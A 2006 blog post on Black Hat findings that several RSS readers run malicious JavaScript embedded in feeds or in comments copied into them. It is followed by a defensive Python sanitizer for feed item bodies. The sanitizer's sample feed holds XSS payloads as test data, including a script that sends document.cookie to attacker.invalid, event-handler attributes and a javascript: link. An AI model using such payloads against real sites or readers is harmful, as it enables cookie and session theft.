Friday, August 4, 2006

Blog RSS feeds pose risk to subscribers

And yes! You guessed it, even more cheerful news springing forth from this week's Black Hat Conference in Las Vegas.

Turns out that several feed readers, the applications that collect and display the popular RSS and Atom formats, will pass malicious JavaScript embedded in a feed straight through to the user, in some cases bypassing the local system's security settings so that the script runs with unfettered access to your machine. Attackers don't even need their own blog: many blogs copy reader comments into their feeds, so injecting the attack code into the comments of a trusted blog is enough!

"Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."

( . . . snip . . . )

"A large percentage of the readers I tested had some kind of an issue," he said. In his presentation, Auger listed Bloglines, RSS Reader, RSS Owl, Feed Demon, and Sharp Reader as vulnerable. As protection, people could switch to a nonvulnerable reader. Also, feed publishers could ensure that their feeds don't include malicious JavaScript or any script at all, Auger said. Some services, however, rely on JavaScript to deliver ads in feeds, he noted."
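Both fixes quoted above come down to the same thing: whoever renders an item body (the publisher before it goes into the feed, or the reader before it hits the browser engine) must strip active content instead of passing the HTML through. The following is an added example, not code from the article, from the post's author, or from any of the readers named above. It builds a small RSS 2.0 feed in which a "trusted blog" has copied a malicious comment into an item's description, then runs each description through a whitelist-based sanitizer that drops script elements (including their contents), event-handler attributes and javascript: links while keeping harmless formatting. The feed text, the tag whitelist and the function names are all constructed for this illustration.

```python
"""Strip active content from RSS item bodies before rendering them.

Added example (not from the original post). The feed below is constructed:
a blog that pastes reader comments verbatim into <description>.
"""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample feed: one legitimate comment, then a hostile one.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel>
<title>Trusted blog</title>
<item>
 <title>Post with comments</title>
 <description><![CDATA[
 <p>Nice <b>write-up</b>. <a href="http://example.com/">link</a></p>
 <p onmouseover="alert(1)">Hover me</p>
 <script>document.location='http://attacker.invalid/?c='+document.cookie</script>
 <a href="javascript:alert(document.cookie)">click</a>
 <img src="x" onerror="alert(2)">
 ]]></description>
</item>
</channel></rss>"""

# Whitelist: anything not listed here is dropped, not escaped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "br", "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on*, style, src, ...
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class FeedSanitizer(HTMLParser):
    """Whitelist HTML sanitizer for feed item bodies.

    Keeps a few formatting tags, drops every other tag, drops all
    attributes except a same-scheme href on <a>, and discards the
    text *inside* <script>/<style> rather than just their tags.
    (A production sanitizer would also balance unclosed tags.)
    """

    def __init__(self):
        super().__init__()          # convert_charrefs=True: data arrives decoded
        self.out = []
        self.skip_depth = 0         # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue            # drops onmouseover, onerror, style, ...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue            # drops javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))  # re-escape text

    def handle_comment(self, data):
        pass                        # comments (incl. IE conditional ones) dropped


def sanitize_html(fragment):
    """Return the whitelisted, re-serialised version of an HTML fragment."""
    p = FeedSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


def sanitized_items(rss_xml):
    """Parse an RSS 2.0 feed and return [(title, safe_description), ...]."""
    root = ET.fromstring(rss_xml)
    items = []
    for item in root.iter("item"):
        title = html.escape(item.findtext("title", default=""))  # titles are plain text
        desc = sanitize_html(item.findtext("description", default=""))
        items.append((title, desc))
    return items


if __name__ == "__main__":
    for title, body in sanitized_items(SAMPLE_RSS):
        print(title)
        print(body)
```

Running it shows the hostile comment reduced to inert markup: the `<script>` element and its payload vanish entirely, the `onmouseover` and `onerror` handlers are gone, the javascript: link keeps its text but loses its href, and the legitimate `<b>` and http:// link survive. The same `sanitize_html` can sit in a reader in front of whatever HTML control it uses to display items, which is the real fix for the readers listed above rather than trusting publishers to do it.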
